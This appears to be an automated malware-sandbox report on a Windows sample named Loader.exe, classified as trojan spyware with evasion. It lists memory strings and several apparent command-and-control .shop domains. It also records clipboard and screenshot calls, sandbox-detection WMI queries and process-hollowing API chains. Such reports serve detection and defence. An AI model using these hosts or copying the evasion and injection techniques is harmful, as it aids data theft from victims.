                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Loader.exe, 00000002.00000002.2921671681.000000000301C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745521965.000000000301C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/
                Source: Loader.exe, 00000002.00000003.1689482955.0000000003035000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/AA
                Source: Loader.exe, 00000002.00000003.1689482955.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1689482955.000000000302A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2380858367.0000000003091000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1768355829.0000000003092000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1751671802.00000000030A4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2381124691.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2380673870.000000000308F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1713749845.0000000005288000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1713773535.000000000528B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921919772.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1713494802.0000000005286000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921877165.0000000003093000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1751671802.0000000003093000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1725461446.000000000528D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/api
                Source: Loader.exe, 00000002.00000003.2381124691.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921919772.00000000030A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/apil
                Source: Loader.exe, 00000002.00000003.1751671802.0000000003087000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop:443/api
                Source: Loader.exe, 00000002.00000003.1745425730.0000000005289000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1752143168.000000000528A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop:443/apiackages
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Loader.exe, 00000002.00000003.1691092298.0000000005325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Loader.exe, 00000002.00000003.1702857705.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691092298.0000000005323000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1703001008.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691247767.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691350994.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1702905282.00000000052D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Loader.exe, 00000002.00000003.1691247767.00000000052B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Loader.exe, 00000002.00000003.1702857705.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691092298.0000000005323000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1703001008.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691247767.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691350994.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1702905282.00000000052D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Loader.exe, 00000002.00000003.1691247767.00000000052B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00432490 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_02FD1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00432620 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt
                Source: C:\Users\user\Desktop\Loader.exe | Code function: String function: 00407FB0 appears 42 times
                Source: C:\Users\user\Desktop\Loader.exe | Code function: String function: 00D41D28 appears 42 times
                Source: C:\Users\user\Desktop\Loader.exe | Code function: String function: 00D4670D appears 34 times
                Source: C:\Users\user\Desktop\Loader.exe | Code function: String function: 00414750 appears 78 times
                Source: C:\Users\user\Desktop\Loader.exe | Code function: String function: 00D39BF0 appears 94 times
                Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Loader.exe | Static PE information: Section: .BSS ZLIB complexity 1.0003276837624584
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00438890 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
                Source: Loader.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Loader.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Loader.exe, 00000002.00000003.1702889101.000000000528B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1702905282.0000000005293000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690919190.00000000052B6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Loader.exe | ReversingLabs: Detection: 44%
                Source: Loader.exe | Virustotal: Detection: 38%
                Source: C:\Users\user\Desktop\Loader.exe | File read: C:\Users\user\Desktop\Loader.exe
                Source: unknown | Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Loader.exe | Section loaded: version.dll
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D39DAA push ecx; ret 0_2_00D39DBD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00448196 push ss; iretd 2_2_0044819A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00447A4C pushad ; iretd 2_2_00447BA3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00447AB3 pushad ; iretd 2_2_00447BA3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00447B2D pushad ; iretd 2_2_00447BA3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004473B9 push ebp; retf 2_2_004473BA
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00444CA1 push ss; retf 2_2_00444CA2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043BF20 push eax; mov dword ptr [esp], EAEBF4F5h2_2_0043BF2E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043EFB0 push eax; mov dword ptr [esp], 69686F3Eh2_2_0043EFB4
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D39DAA push ecx; ret 2_2_00D39DBD
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Loader.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Loader.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\Loader.exe | Window / User API: threadDelayed 7125
                Source: C:\Users\user\Desktop\Loader.exe TID: 1508 | Thread sleep time: -150000s >= -30000s
                Source: C:\Users\user\Desktop\Loader.exe TID: 4960 | Thread sleep count: 7125 > 30
                Source: C:\Users\user\Desktop\Loader.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Loader.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D4B6E8 FindFirstFileExW,0_2_00D4B6E8
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D4B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D4B799
                Source: Loader.exe, 00000002.00000003.1729657655.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1689482955.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921671681.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921671681.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1751671802.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745521965.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1729956527.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1768446656.0000000003035000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\Loader.exe | API call chain: ExitProcess graph end node graph_2-30315
                Source: C:\Users\user\Desktop\Loader.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_0043D760 LdrInitializeThunk,2_2_0043D760
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D39A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D39A73
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D6019E mov edi, dword ptr fs:[00000030h] 0_2_00D6019E
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D31BA0 mov edi, dword ptr fs:[00000030h] 0_2_00D31BA0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00D31BA0 mov edi, dword ptr fs:[00000030h] 2_2_00D31BA0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D47020 GetProcessHeap,0_2_00D47020
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D41A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D41A60
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D39A67 SetUnhandledExceptionFilter,0_2_00D39A67
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D396B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D396B3
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00D39A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D39A73
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00D41A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D41A60
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00D39A67 SetUnhandledExceptionFilter,2_2_00D39A67
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00D396B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00D396B3

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D6019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00D6019E
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5A
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: fancywaxxers.shop
                Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,0_2_00D4B0C5
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,0_2_00D468FD
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D4B1B7
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,0_2_00D4B110
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,0_2_00D4B2BD
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00D4AA37
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,0_2_00D463F5
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,0_2_00D4AC88
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D4AD30
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,0_2_00D4AFF0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,0_2_00D4AF83
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,2_2_00D4B0C5
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,2_2_00D468FD
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00D4B1B7
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,2_2_00D4B110
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,2_2_00D4B2BD
